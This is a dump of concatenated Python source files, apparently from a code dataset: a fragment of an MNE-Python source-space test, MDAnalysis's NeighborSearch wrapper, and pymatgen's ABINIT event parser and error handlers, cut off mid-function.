                    assert_true(len((s0['dist'] - s1['dist']).data) == 0)
            for name in ['pinfo']:
                if s0[name] is not None:
                    assert_true(len(s0[name]) == len(s1[name]))
                    for p1, p2 in zip(s0[name], s1[name]):
                        assert_true(all(p1 == p2))
        else:  # 'approx' in mode:
            # deal with vertno, inuse, and use_tris carefully
            assert_array_equal(s0['vertno'], np.where(s0['inuse'])[0],
                               'left hemisphere vertices')
            assert_array_equal(s1['vertno'], np.where(s1['inuse'])[0],
                               'right hemisphere vertices')
            assert_equal(len(s0['vertno']), len(s1['vertno']))
            agreement = np.mean(s0['inuse'] == s1['inuse'])
            assert_true(agreement >= 0.99, "%s < 0.99" % agreement)
            if agreement < 1.0:
                # make sure mismatched vertno are within 1.5mm
                v0 = np.setdiff1d(s0['vertno'], s1['vertno'])
                v1 = np.setdiff1d(s1['vertno'], s0['vertno'])
                dists = cdist(s0['rr'][v0], s1['rr'][v1])
                assert_allclose(np.min(dists, axis=1), np.zeros(len(v0)),
                                atol=dist_tol, err_msg='mismatched vertno')
            if s0['use_tris'] is not None:  # for "spacing"
                assert_array_equal(s0['use_tris'].shape, s1['use_tris'].shape)
            else:
                assert_true(s1['use_tris'] is None)
            # NOTE(review): this runs even when use_tris is None (None == None
            # evaluates truthy under np.mean); confirm it was not meant to be
            # inside the `is not None` branch above.
            assert_true(np.mean(s0['use_tris'] == s1['use_tris']) > 0.99)
    # The above "if s0[name] is not None" can be removed once the sample
    # dataset is updated to have a source space with distance info
    for name in ['working_dir', 'command_line']:
        if mode == 'exact':
            assert_equal(src0.info[name], src1.info[name])
        else:  # 'approx' in mode:
            if name in src0.info:
                assert_true(name in src1.info, '"%s" missing' % name)
            else:
                assert_true(name not in src1.info,
                            '"%s" should not exist' % name)
| rajegannathan/grasp-lift-eeg-cat-dog-solution-updated | python-packages/mne-python-0.10/mne/source_space.py | Python | bsd-3-clause | 101,801 | [
"Mayavi"
] | adf97e9266371011a3b81f597a3fc6ae7df64cde7630ebd729a25cd8586ca995 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
Neighbor Search wrapper for MDAnalysis --- :mod:`MDAnalysis.lib.NeighborSearch`
===============================================================================
This module contains classes that allow neighbor searches directly with
`AtomGroup` objects from `MDAnalysis`.
"""
import numpy as np
from MDAnalysis.lib.distances import capped_distance
from MDAnalysis.lib.util import unique_int_1d
class AtomNeighborSearch(object):
    """Find all atoms/residues/segments within a given radius of a query
    position.

    For the neighbor search, this class is a wrapper around
    :class:`~MDAnalysis.lib.distances.capped_distance`.
    """

    def __init__(self, atom_group, box=None):
        """
        Parameters
        ----------
        atom_list : AtomGroup
            list of atoms
        box : array-like or ``None``, optional, default ``None``
            Simulation cell dimensions in the form of
            :attr:`MDAnalysis.trajectory.base.Timestep.dimensions` when
            periodic boundary conditions should be taken into account for
            the calculation of contacts.
        """
        self.atom_group = atom_group
        self._u = atom_group.universe
        self._box = box

    def search(self, atoms, radius, level='A'):
        """
        Return all atoms/residues/segments that are within *radius* of the
        atoms in *atoms*.

        Parameters
        ----------
        atoms : AtomGroup, MDAnalysis.core.groups.AtomGroup
            AtomGroup object
        radius : float
            Radius for search in Angstrom.
        level : str
            char (A, R, S). Return atoms(A), residues(R) or segments(S) within
            *radius* of *atoms*.

        Returns
        -------
        AtomGroup : :class:`~MDAnalysis.core.groups.AtomGroup`
            When ``level='A'``, AtomGroup is being returned.
        ResidueGroup : :class:`~MDAnalysis.core.groups.ResidueGroup`
            When ``level='R'``, ResidueGroup is being returned.
        SegmentGroup : :class:`~MDAnalysis.core.groups.SegmentGroup`
            When ``level='S'``, SegmentGroup is being returned.

        .. versionchanged:: 2.0.0
           Now returns :class:`AtomGroup` (when empty this is now an empty
           :class:`AtomGroup` instead of an empty list), :class:`ResidueGroup`,
           or a :class:`SegmentGroup`
        """
        # An AtomGroup exposes ``positions`` whereas a single Atom only
        # exposes ``position``; try the group attribute first.
        try:
            query_coords = atoms.positions
        except AttributeError:
            query_coords = atoms.position

        matched = []
        pairs = capped_distance(query_coords, self.atom_group.positions,
                                radius, box=self._box,
                                return_distances=False)
        if pairs.size > 0:
            # Column 1 holds indices into self.atom_group; deduplicate them.
            matched = unique_int_1d(np.asarray(pairs[:, 1], dtype=np.intp))
        return self._index2level(matched, level)

    def _index2level(self, indices, level):
        """Convert a list of atom indices in the AtomGroup to either the
        Atoms or the segments/residues containing these atoms.

        Parameters
        ----------
        indices
            list of atom indices
        level : str
            char (A, R, S). Return atoms(A), residues(R) or segments(S) within
            *radius* of *atoms*.
        """
        selection = self.atom_group[indices]
        if level == 'A':
            return selection
        if level == 'R':
            return selection.residues
        if level == 'S':
            return selection.segments
        raise NotImplementedError('{0}: level not implemented'.format(level))
| MDAnalysis/mdanalysis | package/MDAnalysis/lib/NeighborSearch.py | Python | gpl-2.0 | 4,718 | [
"MDAnalysis"
] | 8fb118bb51186202d879fbea2d1e4485c71ff33342424106f4fa8c45279ba1c7 |
# coding: utf-8
"""
This module defines the events signaled by abinit during the execution. It also
provides a parser to extract these events form the main output file and the log file.
"""
from __future__ import unicode_literals, division, print_function
import sys
import os.path
import datetime
import collections
import yaml
import six
import abc
import logging
import inspect
import numpy as np
from monty.string import indent, is_string, list_strings
from monty.fnmatch import WildCard
from monty.termcolor import colored
from monty.inspect import all_subclasses
from monty.json import MontyDecoder
from pymatgen.core import Structure
from pymatgen.serializers.json_coders import PMGSONable, pmg_serialize
from .abiinspect import YamlTokenizer
logger = logging.getLogger(__name__)
__all__ = [
"EventsParser",
]
def straceback():
    """Returns a string with the traceback of the exception being handled."""
    # Imported lazily to keep module import lightweight.
    from traceback import format_exc
    return format_exc()
class AbinitEvent(yaml.YAMLObject):
    """
    Example (YAML syntax)::

        Normal warning without any handler:

        --- !Warning
        message: |
            This is a normal warning that won't
            trigger any handler in the python code!
        src_file: routine_name
        src_line: 112
        ...

        Critical warning that will trigger some action in the python code.

        --- !ScfConvergeWarning
        message: |
            The human-readable message goes here!
        src_file: foo.F90
        src_line: 112
        tolname: tolwfr
        actual_tol: 1.0e-8
        required_tol: 1.0e-10
        nstep: 50
        ...

    The algorithm to extract the YAML sections is very simple.

    1) We use YamlTokenizer to extract the documents from the output file
    2) If we have a tag that ends with "Warning", "Error", "Bug", "Comment
       we know we have encountered a new ABINIT event
    3) We parse the document with yaml.load(doc.text) and we get the object

    Note that:
        # --- and ... become reserved words (whey they are placed at
          the begining of a line) since they are used to mark the beginning and
          the end of YAML documents.

        # All the possible events should subclass `AbinitEvent` and define
          the class attribute yaml_tag so that yaml.load will know how to
          build the instance.
    """
    # Terminal color used when the event is printed (see the report __str__);
    # None means the default color.
    color = None

    def __init__(self, src_file, src_line, message):
        """
        Basic constructor for :class:`AbinitEvent`.

        Args:
            message: String with human-readable message providing info on the event.
            src_file: String with the name of the Fortran file where the event is raised.
            src_line Integer giving the line number in src_file.
        """
        self.message = message
        self._src_file = src_file
        self._src_line = src_line
        #print("src_file", src_file, "src_line", src_line)

    @pmg_serialize
    def as_dict(self):
        # yaml_tag is serialized so that from_dict can recover the concrete
        # event class.
        return dict(message=self.message, src_file=self.src_file, src_line=self.src_line, yaml_tag=self.yaml_tag)

    @classmethod
    def from_dict(cls, d):
        # Rebind cls to the concrete subclass registered for this yaml_tag;
        # keys starting with "@" are serialization metadata and are dropped.
        cls = as_event_class(d.get("yaml_tag"))
        return cls(**{k: v for k,v in d.items() if k != "yaml_tag" and not k.startswith("@")})

    @property
    def header(self):
        # One-line summary of the form "<ClassName at file:line>".
        return "<%s at %s:%s>" % (self.name, self.src_file, self.src_line)

    def __repr__(self):
        return self.header

    def __str__(self):
        return "\n".join((self.header, self.message))

    def __eq__(self, other):
        # Events compare equal on message only; src_file/src_line are ignored.
        if other is None: return False
        return self.message == other.message

    def __ne__(self, other):
        return not self.__eq__(other)

    @property
    def src_file(self):
        """String with the name of the Fortran file where the event is raised."""
        try:
            return self._src_file
        except AttributeError:
            # The attribute may be absent on instances not built through
            # __init__ (e.g. constructed by the YAML loader).
            return "Unknown"

    @property
    def src_line(self):
        """Integer giving the line number in src_file."""
        try:
            return self._src_line
        except AttributeError:
            return "Unknown"

    @property
    def name(self):
        """Name of the event (class name)"""
        return self.__class__.__name__

    @property
    def baseclass(self):
        """The baseclass of self."""
        # Order of _BASE_CLASSES matters: the first isinstance match wins.
        for cls in _BASE_CLASSES:
            if isinstance(self, cls):
                return cls

        raise ValueError("Cannot determine the base class of %s" % self.__class__.__name__)

    def correct(self, task):
        """
        This method is called when an error is detected in a :class:`Task`
        It should perform any corrective measures relating to the detected error.
        The idea is similar to the one used in custodian but the handler receives
        a :class:`Task` object so that we have access to its methods.

        Returns:
        (dict) JSON serializable dict that describes the errors and actions taken. E.g.
        {"errors": list_of_errors, "actions": list_of_actions_taken}.
        If this is an unfixable error, actions should be set to None.
        """
        # NOTE(review): the default returns 0 although the docstring promises
        # a dict; subclasses presumably override this -- confirm callers
        # accept the integer sentinel.
        return 0
class AbinitComment(AbinitEvent):
    """Base class for Comment events (abinit YAML tag ``!COMMENT``)."""
    yaml_tag = '!COMMENT'
    # Comments are printed in blue by the event report.
    color = "blue"
class AbinitError(AbinitEvent):
    """Base class for Error events (abinit YAML tag ``!ERROR``)."""
    yaml_tag = '!ERROR'
    # Errors are printed in red by the event report.
    color = "red"
class AbinitYamlError(AbinitError):
    """
    Raised if the YAML parser cannot parse the document and the doc tag is an Error.
    It's an AbinitError because the msg produced by the code is not valid YAML!

    Instantiated by :meth:`EventsParser.parse` as a fallback when yaml.load fails.
    """
class AbinitBug(AbinitEvent):
    """Base class for Bug events (abinit YAML tag ``!BUG``)."""
    yaml_tag = '!BUG'
    # Bugs are printed in red by the event report.
    color = "red"
class AbinitWarning(AbinitEvent):
    """
    Base class for Warning events (the most important class).
    Developers should subclass this class to define the different exceptions
    raised by the code and the possible actions that can be performed.
    """
    yaml_tag = '!WARNING'
    # None: plain warnings are printed in the default terminal color.
    color = None
class AbinitCriticalWarning(AbinitWarning):
    """Warning highlighted in red; base class for the convergence warnings
    below (per the module comment, warnings that trigger restart)."""
    color = "red"
class AbinitYamlWarning(AbinitCriticalWarning):
    """
    Raised if the YAML parser cannot parse the document and the doc tas is a Warning.

    Instantiated by :meth:`EventsParser.parse` as a fallback when yaml.load fails.
    """
# Warnings that trigger restart.
class ScfConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the GS SCF cycle did not converge."""
    yaml_tag = '!ScfConvergenceWarning'
class NscfConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the GS NSCF cycle did not converge."""
    yaml_tag = '!NscfConvergenceWarning'
class RelaxConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the structural relaxation did not converge."""
    yaml_tag = '!RelaxConvergenceWarning'
# TODO: for the time being we don't discern between GS and PhononCalculations.
#class PhononConvergenceWarning(AbinitCriticalWarning):
# """Warning raised when the phonon calculation did not converge."""
# yaml_tag = u'!PhononConvergenceWarning'
class QPSConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the QPS iteration (GW) did not converge."""
    yaml_tag = '!QPSConvergenceWarning'
class HaydockConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the Haydock method (BSE) did not converge."""
    yaml_tag = '!HaydockConvergenceWarning'
# Error classes providing a correct method.

# Register the concrete base classes.
# NOTE: order matters -- AbinitEvent.baseclass returns the first class in
# this list for which isinstance() is true.
_BASE_CLASSES = [
    AbinitComment,
    AbinitError,
    AbinitBug,
    AbinitWarning,
]
class EventReport(collections.Iterable, PMGSONable):
    """
    Iterable storing the events raised by an ABINIT calculation.

    Attributes::

        stat: information about a file as returned by os.stat
    """
    # NOTE(review): collections.Iterable is deprecated (removed in Python
    # 3.10) in favor of collections.abc.Iterable; kept as-is for the
    # Python 2/3 era this module targets.
    def __init__(self, filename, events=None):
        """
        List of ABINIT events.

        Args:
            filename: Name of the file
            events: List of Event objects
        """
        self.filename = os.path.abspath(filename)
        # Snapshot of the file metadata taken at construction time.
        self.stat = os.stat(self.filename)
        self.start_datetime, self.end_datetime = None, None

        self._events = []
        # Events grouped by their concrete base class (Comment/Error/Bug/Warning).
        self._events_by_baseclass = collections.defaultdict(list)

        if events is not None:
            for ev in events:
                self.append(ev)

    def __len__(self):
        return len(self._events)

    def __iter__(self):
        return self._events.__iter__()

    def __getitem__(self, slice):
        return self._events[slice]

    def __str__(self):
        #has_colours = stream_has_colours(stream)
        has_colours = True

        lines = []
        app = lines.append

        app("Events found in %s\n" % self.filename)
        for i, event in enumerate(self):
            if has_colours:
                app("[%d] %s" % (i+1, colored(event.header, color=event.color)))
                app(indent(event.message, 4))
            else:
                app("[%d] %s" % (i+1, str(event)))

        app("num_errors: %s, num_warnings: %s, num_comments: %s, completed: %s\n" % (
            self.num_errors, self.num_warnings, self.num_comments, self.run_completed))

        return "\n".join(lines)

    def append(self, event):
        """Add an event to the list."""
        self._events.append(event)
        self._events_by_baseclass[event.baseclass].append(event)

    def set_run_completed(self, boolean, start_datetime, end_datetime):
        """Set the value of _run_completed and parse the run timestamps."""
        self._run_completed = boolean

        if (start_datetime, end_datetime) != (None, None):
            # start_datetime: Sat Feb 28 23:54:27 2015
            # end_datetime: Sat Feb 28 23:54:30 2015
            try:
                fmt = "%a %b %d %H:%M:%S %Y"
                self.start_datetime = datetime.datetime.strptime(start_datetime, fmt)
                self.end_datetime = datetime.datetime.strptime(end_datetime, fmt)
            except Exception as exc:
                # Maybe LOCALE != en_US
                logger.warning(str(exc))

    @property
    def run_etime(self):
        """Wall-time of the run as `timedelta` object."""
        if self.start_datetime is None or self.end_datetime is None:
            return None

        # BUGFIX: previously read `self.start_dateime` (typo), which raised
        # AttributeError whenever both timestamps were actually available.
        return self.end_datetime - self.start_datetime

    @property
    def run_completed(self):
        """True if the calculation terminated."""
        try:
            return self._run_completed
        except AttributeError:
            # set_run_completed was never called.
            return False

    @property
    def comments(self):
        """List of comments found."""
        return self.select(AbinitComment)

    @property
    def errors(self):
        """List of errors + bugs found."""
        return self.select(AbinitError) + self.select(AbinitBug)

    @property
    def warnings(self):
        """List of warnings found."""
        return self.select(AbinitWarning)

    @property
    def num_warnings(self):
        """Number of warnings reported."""
        return len(self.warnings)

    @property
    def num_errors(self):
        """Number of errors reported."""
        return len(self.errors)

    @property
    def num_comments(self):
        """Number of comments reported."""
        return len(self.comments)

    def select(self, base_class):
        """
        Return the list of events that inherits from class base_class
        """
        return self._events_by_baseclass[base_class]

    def filter_types(self, event_types):
        """Return a new report containing only events whose exact type is
        in event_types (subclasses are intentionally not matched)."""
        events = []
        for ev in self:
            if type(ev) in event_types: events.append(ev)
        return self.__class__(filename=self.filename, events=events)

    def get_events_of_type(self, event_class):
        """Return a list of events of the given class (exact type match)."""
        return [ev for ev in self if type(ev) == event_class]

    @pmg_serialize
    def as_dict(self):
        return dict(filename=self.filename, events=[e.as_dict() for e in self._events])

    @classmethod
    def from_dict(cls, d):
        return cls(filename=d["filename"], events=[AbinitEvent.from_dict(e) for e in d["events"]])
class EventsParserError(Exception):
    """Exception raised by :class:`EventsParser` when parsing fails."""
class EventsParser(object):
    """
    Parses the output or the log file produced by ABINIT and extract the list of events.
    """
    # Exception class exposed for callers (custodian-style convention).
    Error = EventsParserError

    def parse(self, filename, verbose=0):
        """
        Parse the given file. Return :class:`EventReport`.

        Args:
            filename: Path to the ABINIT output/log file.
            verbose: If truthy, append the Python traceback to the message of
                events built from malformatted YAML documents (expensive when
                many documents are malformatted).
        """
        run_completed, start_datetime, end_datetime = False, None, None
        filename = os.path.abspath(filename)
        report = EventReport(filename)

        # TODO Use CamelCase for the Fortran messages.
        # Bug is still an error of class SoftwareError
        w = WildCard("*Error|*Warning|*Comment|*Bug|*ERROR|*WARNING|*COMMENT|*BUG")

        with YamlTokenizer(filename) as tokens:
            for doc in tokens:
                if w.match(doc.tag):
                    #print("got doc.tag", doc.tag,"--")
                    try:
                        #print(doc.text)
                        # NOTE(review): yaml.load without an explicit Loader
                        # can construct arbitrary Python objects from tags;
                        # here it builds the registered AbinitEvent
                        # subclasses. Acceptable only because the input is
                        # ABINIT's own output -- confirm it is never fed
                        # untrusted files.
                        event = yaml.load(doc.text)
                        #print(event.yaml_tag, type(event))
                    except:
                        # Bare except is deliberate: any parse failure is
                        # converted into a synthetic error/warning event.
                        #raise
                        # Wrong YAML doc. Check tha doc tag and instantiate the proper event.
                        message = "Malformatted YAML document at line: %d\n" % doc.lineno
                        message += doc.text

                        # This call is very expensive when we have many exceptions due to malformatted YAML docs.
                        if verbose:
                            message += "Traceback:\n %s" % straceback()

                        if "error" in doc.tag.lower():
                            print("It seems an error", doc.tag)
                            event = AbinitYamlError(message=message, src_file=__file__, src_line=0)
                        else:
                            event = AbinitYamlWarning(message=message, src_file=__file__, src_line=0)

                    event.lineno = doc.lineno
                    report.append(event)

                # Check whether the calculation completed.
                if doc.tag == "!FinalSummary":
                    run_completed = True
                    d = doc.as_dict()
                    start_datetime, end_datetime = d["start_datetime"], d["end_datetime"]

        report.set_run_completed(run_completed, start_datetime, end_datetime)
        return report

    def report_exception(self, filename, exc):
        """
        This method is used when self.parser raises an Exception so that
        we can report a customized :class:`EventReport` object with info the exception.
        """
        # Build fake event.
        event = AbinitError(src_file="Unknown", src_line=0, message=str(exc))
        return EventReport(filename, events=[event])
class EventHandler(six.with_metaclass(abc.ABCMeta, object)):
    """
    Abstract base class defining the interface for an EventHandler.

    The ``__init__`` should always provide default values for its arguments so that we can
    easily instantiate the handlers with:

        handlers = [cls() for cls in get_event_handler_classes()]

    The default values should be chosen so to cover the most typical cases.

    Each EventHandler should define the class attribute `can_change_physics`
    that is true if the handler changes `important` parameters of the
    run that are tightly connected to the physics of the system.

    For example, an `EventHandler` that changes the value of `dilatmx` and
    prepare the restart is not changing the physics. Similarly a handler
    that changes the mixing algorithm. On the contrary, a handler that
    changes the value of the smearing is modifying an important physical
    parameter, and the user should be made aware of this so that
    there's an explicit agreement between the user and the code.

    The default handlers are those that do not change the physics,
    other handlers can be installed by the user when constructing with the flow with
    TODO

    .. warning::

        The EventHandler should perform any action at the level of the input files
        needed to solve the problem and then prepare the task for a new submission
        The handler should never try to resubmit the task. The submission must be
        delegated to the scheduler or Fireworks.
    """
    event_class = AbinitEvent
    """AbinitEvent subclass associated to this handler."""
    #can_change_physics
    # Return codes for handle_task_event.
    FIXED = 1
    NOT_FIXED = 0

    @classmethod
    def cls2str(cls):
        """Return a human-readable summary of the handler and its event class."""
        lines = []
        app = lines.append
        ecls = cls.event_class
        app("event name = %s" % ecls.yaml_tag)
        app("event documentation: ")
        lines.extend(ecls.__doc__.split("\n"))
        app("handler documentation: ")
        lines.extend(cls.__doc__.split("\n"))
        return "\n".join(lines)

    def __str__(self):
        return "<%s>" % self.__class__.__name__

    def can_handle(self, event):
        """True if this handler is associated to the given :class:`AbinitEvent`"""
        return self.event_class == event.__class__

    # TODO: defined CorrectionRecord object and provide helper functions to build it
    def count(self, task):
        """
        Return the number of times the event associated to this handler
        has been already fixed in the :class:`Task`.
        """
        # NOTE(review): this compares the serialized "@class" entry (presumably a
        # string) with the class object itself — verify the comparison is intended.
        return len([c for c in task.corrections if c["event"]["@class"] == self.event_class])

    @abc.abstractmethod
    def handle_task_event(self, task, event):
        """
        Method to handle Abinit events.

        Args:
            task: :class:`Task` object.
            event: :class:`AbinitEvent` found in the log file.

        Return:
            0 if no action has been applied, 1 if the problem has been fixed.
        """

    @pmg_serialize
    def as_dict(self):
        #@Guido this introspection is nice but it's not safe
        # Serializes the handler by recording the current value of every
        # __init__ argument (assumes each arg is stored as an attribute).
        d = {}
        if hasattr(self, "__init__"):
            for c in inspect.getargspec(self.__init__).args:
                if c != "self":
                    d[c] = self.__getattribute__(c)
        return d

    @classmethod
    def from_dict(cls, d):
        """Rebuild the handler, keeping only the keys accepted by ``cls.__init__``."""
        kwargs = {k: v for k, v in d.items() if k in inspect.getargspec(cls.__init__).args}
        return cls(**kwargs)

    @classmethod
    def compare_inputs(cls, new_input, old_input):
        """
        Diff two abinit inputs and return a dict describing the changes
        (keys: '_set', '_update', '_change_structure', '_pop').
        """
        def vars_dict(d):
            """
            make a simple dictionary and convert numpy arrays to lists
            """
            new_d = {}
            for key, value in d.items():
                if isinstance(value, np.ndarray): value = value.tolist()
                new_d[key] = value
            return new_d

        new_vars = vars_dict(new_input)
        old_vars = vars_dict(old_input)
        new_keys = set(new_vars.keys())
        old_keys = set(old_vars.keys())
        intersect = new_keys.intersection(old_keys)
        added_keys = new_keys - intersect
        removed_keys = old_keys - intersect
        changed_keys = set(v for v in intersect if new_vars[v] != old_vars[v])
        log_diff = {}
        if added_keys:
            log_diff['_set'] = {k: new_vars[k] for k in added_keys}
        if changed_keys:
            log_diff['_update'] = ({k: {'new': new_vars[k], 'old': old_vars[k]} for k in changed_keys})
        if new_input.structure != old_input.structure:
            log_diff['_change_structure'] = new_input.structure.as_dict()
        if removed_keys:
            log_diff['_pop'] = {k: old_vars[k] for k in removed_keys}
        return log_diff
class Correction(PMGSONable):
    """Record of a correction applied by an :class:`EventHandler` to a task/input."""

    def __init__(self, handler, actions, event, reset=False):
        self.handler = handler
        self.actions = actions
        self.event = event
        self.reset = reset

    @pmg_serialize
    def as_dict(self):
        """Return a serializable dict describing this correction."""
        return {
            "handler": self.handler.as_dict(),
            "actions": self.actions,
            "event": self.event.as_dict(),
            "reset": self.reset,
        }

    @classmethod
    def from_dict(cls, d):
        """Rebuild the correction from its serialized form."""
        decoder = MontyDecoder()
        handler = decoder.process_decoded(d['handler'])
        event = decoder.process_decoded(d['event'])
        return cls(handler=handler, actions=d['actions'], event=event, reset=d['reset'])
#class WarningHandler(EventHandler):
# """Base class for handlers associated to ABINIT warnings."""
# event_class = AbinitWarning
#
#class BugHandler(EventHandler):
# """Base class for handlers associated to ABINIT bugs."""
# event_class = AbinitBug
class ErrorHandler(EventHandler):
    """Base class for handlers associated to ABINIT errors."""
    # Concrete subclasses override event_class with the specific AbinitError subclass.
    event_class = AbinitError
# Abstract handler base classes that must be excluded from subclass auto-discovery.
# Idiom fix: use a set literal instead of set([...,]).
_ABC_EVHANDLER_CLASSES = {ErrorHandler}
# Public API
def autodoc_event_handlers(stream=sys.stdout):
    """
    Write to the given stream the documentation for the events
    and the associated handlers.

    Args:
        stream: writable file-like object (default: sys.stdout).

    Raises:
        RuntimeError: if a concrete handler does not define `can_change_physics`.
    """
    lines = []
    for cls in all_subclasses(EventHandler):
        if cls in _ABC_EVHANDLER_CLASSES: continue
        # (fix: removed unused local `event_class = cls.event_class`)
        lines.extend(cls.cls2str().split("\n"))
        # Here we enforce the abstract protocol of the class
        # The unit test in tests_events will detect the problem.
        if not hasattr(cls, "can_change_physics"):
            raise RuntimeError("%s: can_change_physics must be defined" % cls)
    stream.write("\n".join(lines) + "\n")
def get_event_handler_classes(categories=None):
    """Return the list of handler classes."""
    abstract = _ABC_EVHANDLER_CLASSES
    return [cls for cls in all_subclasses(EventHandler) if cls not in abstract]
def as_event_class(obj):
    """
    Convert obj into a subclass of AbinitEvent.
    obj can be either a class or a string with the class name or the YAML tag
    """
    if is_string(obj):
        for cls in all_subclasses(AbinitEvent):
            if obj in (cls.__name__, cls.yaml_tag):
                return cls
        raise ValueError("Cannot find event class associated to %s" % obj)

    # Not a string: assume the caller already passed an event class.
    assert obj in all_subclasses(AbinitEvent)
    return obj
############################################
########## Concrete classes ################
############################################
class DilatmxError(AbinitError):
    """
    This Error occurs in variable cell calculations when the increase in the
    unit cell volume is too large.
    """
    yaml_tag = '!DilatmxError'
    # NOTE(review): the commented-out correct() below appears to have been
    # superseded by DilatmxErrorHandler — candidate for deletion.
    #def correct(self, task):
    #    #Idea: decrease dilatxm and restart from the last structure.
    #    #We would like to end up with a structures optimized with dilatmx 1.01
    #    #that will be used for phonon calculations.
    #    if not self.enabled:
    #        task.log_correction(self, "Handler for %s has been disabled")
    #        return 1 # what?
    #    # Read the last structure dumped by ABINIT before aborting.
    #    print("in dilatmx")
    #    filepath = task.outdir.has_abiext("DILATMX_STRUCT.nc")
    #    last_structure = Structure.from_file(filepath)
    #    task._change_structure(last_structure)
    #    #changes = task._modify_vars(dilatmx=1.05)
    #    action = "Take last structure from DILATMX_STRUCT.nc, will restart with dilatmx: %s" % task.get_inpvar("dilatmx")
    #    task.log_correction(self, action)
    #    return 1
class DilatmxErrorHandler(ErrorHandler):
    """
    Handle DilatmxError. Abinit produces a netcdf file with the last structure before aborting
    The handler changes the structure in the input with the last configuration and modify the value of dilatmx.
    """
    event_class = DilatmxError

    can_change_physics = False

    def __init__(self, max_dilatmx=1.3):
        """
        Args:
            max_dilatmx: upper bound for the dilatmx value this handler may set.
        """
        self.max_dilatmx = max_dilatmx

    def handle_task_event(self, task, event):
        """
        Replace the task structure with the last configuration dumped by ABINIT
        (DILATMX_STRUCT.nc) and log the correction.

        Returns:
            self.FIXED (the task can be resubmitted with the new structure).
        """
        # Read the last structure dumped by ABINIT before aborting.
        filepath = task.outdir.has_abiext("DILATMX_STRUCT.nc")
        last_structure = Structure.from_file(filepath)
        task._change_structure(last_structure)

        msg = "Take last structure from DILATMX_STRUCT.nc, will try to restart with dilatmx %s" % task.get_inpvar("dilatmx")
        task.log_correction(event, msg)
        # Note that we change the structure but we don't try restart from the previous WFK|DEN file
        # because Abinit called mpi_abort and therefore no final WFK|DEN file has been produced.
        return self.FIXED

    def handle_input_event(self, abiinput, outdir, event):
        """
        Same correction as handle_task_event but applied directly to an input object.

        Returns:
            :class:`Correction` on success, None if the fix could not be applied.
        """
        try:
            old_abiinput = abiinput.deepcopy()
            # Read the last structure dumped by ABINIT before aborting.
            filepath = outdir.has_abiext("DILATMX_STRUCT.nc")
            last_structure = Structure.from_file(filepath)
            abiinput.set_structure(last_structure)
            return Correction(self, self.compare_inputs(abiinput, old_abiinput), event, False)
        except Exception as exc:
            # BUGFIX: the original message had no placeholder for the extra `exc`
            # argument, which broke log-record formatting. Use lazy %-style args.
            logger.warning("Error while trying to apply the handler %s: %s", self, exc)
            return None
"""
class DilatmxErrorHandlerTest(ErrorHandler):
def __init__(self, max_dilatmx=1.3):
self.max_dilatmx = max_dilatmx
def handle_task_event(self, task, event):
msg = event.message
# Check if the handler is suitable to deal with this error
if msg.find("You need at least dilatmx=") == -1:
return {"status": self.NOT_FIXED, "msg": "{} can not fix event: {}".format(self.__class__, event)}
#read the suggested dilatmx
try:
new_dilatmx = float(msg.split('dilatmx=')[1].split('\n')[0].strip())
except:
return {"status": self.NOT_FIXED, "msg": "Couldn't parse dilatmx."}
if new_dilatmx > self.max_dilatmx:
msg = "Suggested dilatmx ({}) exceeds maximux configured value ({}).".format(new_dilatmx, self.max_dilatmx)
return self.NOT_FIXED
task.strategy.abinit_input.set_vars(dilatmx=new_dilatmx)
msg = "Take last structure from DILATMX_STRUCT.nc, will try to restart with dilatmx %s" % task.get_inpvar("dilatmx")
task.log_correction(event, msg)
return self.FIXED
"""
class TolSymError(AbinitError):
    """
    Class of errors raised by Abinit when it cannot detect the symmetries of the system.
    The handler assumes the structure makes sense and the error is just due to numerical inaccuracies.
    We increase the value of tolsym in the input file (default 1-8) so that Abinit can find the space group
    and re-symmetrize the input structure.
    """
    # YAML tag emitted by ABINIT for this error class.
    yaml_tag = '!TolSymError'
class TolSymErrorHandler(ErrorHandler):
    """
    Increase the value of tolsym in the input file.
    """
    event_class = TolSymError

    can_change_physics = False

    def __init__(self, max_nfixes=3):
        """
        Args:
            max_nfixes: cap on how many times this correction is applied to one task.
        """
        self.max_nfixes = max_nfixes

    def handle_task_event(self, task, event):
        """
        Raise tolsym by one order of magnitude (starting from 1e-6 if unset).

        Returns:
            self.FIXED on success, self.NOT_FIXED if the fix limit was reached.
        """
        # TODO: Add limit on the number of fixes one can do for the same error
        # For example in this case, the scheduler will stop after 20 submissions
        if self.count(task) > self.max_nfixes:
            return self.NOT_FIXED

        old_tolsym = task.get_inpvar("tolsym")
        new_tolsym = 1e-6 if old_tolsym is None else old_tolsym * 10
        task._set_inpvars(tolsym=new_tolsym)
        task.log_correction(event, "Increasing tolsym from %s to %s" % (old_tolsym, new_tolsym))
        return self.FIXED

    def handle_input_event(self, abiinput, outdir, event):
        """
        Same correction as handle_task_event but applied directly to an input object.

        Returns:
            :class:`Correction` on success, None if the fix could not be applied.
        """
        try:
            old_abiinput = abiinput.deepcopy()
            old_tolsym = abiinput["tolsym"]
            new_tolsym = 1e-6 if old_tolsym is None else old_tolsym * 10
            abiinput.set_vars(tolsym=new_tolsym)
            return Correction(self, self.compare_inputs(abiinput, old_abiinput), event, False)
        except Exception as exc:
            # BUGFIX: the original message had no placeholder for the extra `exc`
            # argument, which broke log-record formatting. Use lazy %-style args.
